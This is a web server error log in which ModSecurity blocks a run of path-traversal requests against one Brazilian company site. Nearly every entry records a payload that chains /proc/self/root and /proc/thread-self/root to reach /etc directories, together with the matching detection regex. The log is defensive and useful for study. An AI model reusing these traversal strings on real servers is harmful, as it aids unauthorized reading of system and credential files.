[Mon Mar 16 14:35:51.567881 2026] [:error] [pid 15568:tid 140411565680384] [client 74.7.243.203:51240] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_d6QpVkWug9HeOt8_yAAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:35:56.981153 2026] [:error] [pid 11972:tid 140411590858496] [client 74.7.243.203:51566] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_fJqj1wV0Si-Okef4cQAAABI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:35:58.525618 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.243.203:51582] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_frABkC4fWIHEf8H5DwAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:36:02.310531 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.241.46:43472] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_grABkC4fWIHEf8H5EgAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:36:06.366250 2026] [:error] [pid 10831:tid 140411741927168] [client 74.7.241.46:42044] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_ho6lpbStxTqkSkt14QAAAkA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:36:07.961902 2026] [:error] [pid 15061:tid 140411599251200] [client 74.7.241.46:42060] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_h6TCbgAP5jq5Teg1sQAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:36:14.455787 2026] [:error] [pid 15568:tid 140411548894976] [client 74.7.243.203:51594] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_jqQpVkWug9HeOt8_2AAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:36:18.411302 2026] [:error] [pid 21533:tid 140411582465792] [client 74.7.243.203:59790] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_knjZBu2q05ozVU9j-gAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:37:00.459835 2026] [:error] [pid 15061:tid 140411557287680] [client 74.7.241.46:57036] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_vKTCbgAP5jq5Teg1_wAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:01.834075 2026] [:error] [pid 14895:tid 140411741927168] [client 74.7.241.46:44436] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_vVajLEzk2WiQ-10cSQAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:03.239874 2026] [:error] [pid 15568:tid 140411658000128] [client 74.7.241.46:44438] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_v6QpVkWug9HeOt8_3wAAA0o"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:05.475395 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.241.46:44452] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_wY6lpbStxTqkSkt16QAAAkc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:07.365029 2026] [:error] [pid 10831:tid 140411607643904] [client 74.7.241.46:44466] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_w46lpbStxTqkSkt16wAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:08.779913 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.241.46:51814] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_xLABkC4fWIHEf8H5JQAAAFY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:08.871303 2026] [:error] [pid 10651:tid 140411557287680] [client 74.7.228.16:55460] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abg_xLysWC90G-1nBrBOGQAAAZY"]
[Mon Mar 16 14:37:10.034514 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.241.46:51824] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_xrABkC4fWIHEf8H5JgAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:10.955201 2026] [:error] [pid 10772:tid 140411725141760] [client 74.7.243.203:59792] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_xv9ocpUE4ed4uDz5dgAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:37:11.426217 2026] [:error] [pid 21533:tid 140411632822016] [client 74.7.241.46:51830] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_x3jZBu2q05ozVU9kBQAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:12.452915 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.243.203:58558] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_yNSswJuvopo3lOho5QAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:37:12.639887 2026] [:error] [pid 21806:tid 140411590858496] [client 74.7.241.46:51840] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_yNSswJuvopo3lOho5gAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:13.888891 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.241.46:51844] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_ybABkC4fWIHEf8H5JwAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 14:37:15.123347 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.241.46:51852] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg_y_9ocpUE4ed4uDz5eAAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
